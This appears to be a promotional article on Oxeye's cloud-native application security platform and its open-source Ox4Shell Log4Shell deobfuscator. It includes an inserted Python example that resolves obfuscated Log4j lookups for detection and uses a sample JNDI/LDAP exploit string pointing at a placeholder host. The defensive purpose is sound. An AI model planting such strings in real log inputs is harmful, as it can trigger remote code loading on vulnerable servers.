Oxeye: A Solution to the Cloud Native Application Security Equation
Legacy application security testing (AST) technologies have long struggled with accuracy. To automate security for cloud native apps, findings must be precise, dependable, and contextual. While other AST tools focus only on discovering vulnerabilities, Oxeye adds context to each vulnerability while reducing false positives and negatives. In cloud native apps, code is spread across many locations: pieces are deployed separately, communicate at runtime, and execute on different parts of the infrastructure. To present the entire contextual vulnerability flow, Oxeye performs automated risk analysis augmented with environment data from the cloud, clusters, and containers. Security flaws demand rapid attention, but not all flaws are serious. Oxeye analyzes the code across the SDLC and provides a prioritized, verified assessment of high-risk code vulnerabilities, together with clear remediation instructions. This analysis is what keeps the noise of false positives and negatives down. Even in the most complicated cloud native architectures, the technology uses security analysis and prioritization to identify application-layer vulnerabilities. Oxeye also scans the container, cluster, and cloud deployment layers to enrich the findings and produce an accurate risk and vulnerability ranking.
"Old-school" software composition analysis (SCA) and static, dynamic, and interactive application security testing (SAST, DAST, and IAST) tools execute in parallel, are not synchronized, and cannot cross-reference or use richer data from the other code layers in the environment. Because of the insufficient and erroneous data they produce when testing cloud-native apps, a new strategy and better tools are required. One such tool is Oxeye. It integrates all AST approaches with a new generation of security control assessment capabilities, resulting in a system that identifies and accurately prioritizes the vulnerabilities in cloud-native applications that need to be fixed. It lets developers and AppSec teams focus on high-risk, critical vulnerabilities by filtering out the noise of false positives and negatives produced by outdated solutions. The analysis takes place in real time, and the data is transferred to the company's SaaS platform, which correlates it, offers a contextual risk assessment for each discovered vulnerability, and prioritizes them based on how they occur at runtime and what opportunities they present to attackers. "Pieces of code are located literally everywhere throughout cloud-native applications. The Oxeye platform provides a single unified platform for modern application security testing, providing highly accurate vulnerability testing prior to production. With it, users gain access to the most prominent, automated security risk testing solution for all important stages of software development," says Dean Agron, Co-Founder and CEO of Oxeye.
The Log4Shell vulnerability relies on providing user-controlled input to a Log4j logging function. When the function encounters specific values such as ${variable1}, the vulnerable program tries to look up the variable in the current thread context. During its research, the team focused on the most popular lookup functions: those that let threat actors disguise malicious intent behind hard-to-analyze payloads. Ox4Shell resolves such lookup functions by feeding them mock data that businesses control. The data is supplied via mock.json, a JSON file containing special values that are substituted into the deobfuscated payloads.
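The following is an added illustration of the deobfuscation idea described above; it is not Ox4Shell's code, and the layout of the mock data (an `env` and a `sys` table) is an assumption standing in for a mock.json file. It resolves the well-known Log4j lookup forms (`${lower:...}`, `${upper:...}`, `${prefix:key:-default}`, and the empty-prefix `${::-x}` trick) from the innermost lookup outward, feeds `env`/`sys` lookups mock values instead of touching the host, and deliberately never resolves `jndi`, so that whatever remains after substitution is the payload an analyst or a detection rule needs to see.

```python
import json
import re

# Constructed stand-in for a mock.json file: values that ${env:...} and
# ${sys:...} lookups resolve to during analysis (the structure is an assumption).
MOCK_JSON = json.dumps({
    "env": {"HOSTNAME": "mock-host", "USER": "mock-user"},
    "sys": {"java.version": "mock-java", "user.name": "mock-user"},
})

# Matches an innermost lookup: a ${...} whose body contains no nested ${ or }.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# Lookups that would reach out to the network or host are never resolved;
# leaving them literal is exactly what exposes the real payload to the analyst.
UNSAFE_PREFIXES = {"jndi"}


def resolve_lookup(body, mocks):
    """Resolve one lookup body (the text between ${ and }) against mock data.

    Returns None when the lookup cannot be resolved, mirroring Log4j leaving
    an unknown lookup in place.
    """
    # Log4j's ':-' separator introduces a fallback used when the lookup fails.
    name, has_default, default = body.partition(":-")
    # The text before the first ':' selects the lookup (case-insensitive in Log4j).
    prefix, _, key = name.partition(":")
    prefix = prefix.lower()
    if prefix in UNSAFE_PREFIXES:
        return None
    value = None
    if prefix == "lower":
        value = key.lower()
    elif prefix == "upper":
        value = key.upper()
    elif prefix in mocks:
        value = mocks[prefix].get(key)
    if value is None and has_default:
        value = default
    return value


def deobfuscate(payload, mock_json=MOCK_JSON, max_rounds=50):
    """Repeatedly substitute innermost lookups until nothing more resolves."""
    mocks = json.loads(mock_json)

    def substitute(match):
        resolved = resolve_lookup(match.group(1), mocks)
        return match.group(0) if resolved is None else resolved

    current = payload
    for _ in range(max_rounds):
        updated = INNERMOST.sub(substitute, current)
        if updated == current:
            break
        current = updated
    return current


def is_suspicious(payload):
    """Detection check: does the deobfuscated text still carry a jndi lookup?"""
    return "${jndi:" in deobfuscate(payload).lower()


if __name__ == "__main__":
    # Constructed sample: the lookups hide the prefix and scheme from naive string matching.
    sample = "${${lower:j}ndi:${lower:L}dap://example.invalid/a}"
    print(deobfuscate(sample))      # ${jndi:ldap://example.invalid/a}
    print(is_suspicious(sample))    # True
```

Matching the raw log line against the string `jndi` would miss the constructed sample entirely; matching the deobfuscated form catches it, which is the point of resolving lookups before detection or triage. Mock values keep the analysis side-effect free: no environment variable, system property or remote server is ever consulted.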
Oxeye recently announced the launch of Ox4Shell, an open-source effort. Oxeye is developing a set of solutions to aid developers, AppSec experts, and the open-source community, including a free, open-source payload deobfuscation tool. Ox4Shell is meant to combat the Log4Shell zero-day vulnerability, dubbed the "Covid of the Internet" by some. To counter a powerful obfuscation approach employed by hostile actors, Oxeye's new open-source tool (available on GitHub) uncovers the hidden payloads currently being used to confound security protection solutions and security teams.
Developers, in the end, are the ones who fix the problems that have been uncovered. Oxeye works as an integral part of the CI/CD pipeline to make the process as simple as possible for them: as they test the code they write, Oxeye automatically detects vulnerabilities at runtime, notifies them (for example, via Slack), and delivers everything they need to fix the issue directly to their issue tracking software (e.g., Jira). Oxeye is a developer-centric technology that lets teams shift security left and place some of the responsibility for application security on developers, without encumbering them or impeding their ability to deliver code quickly.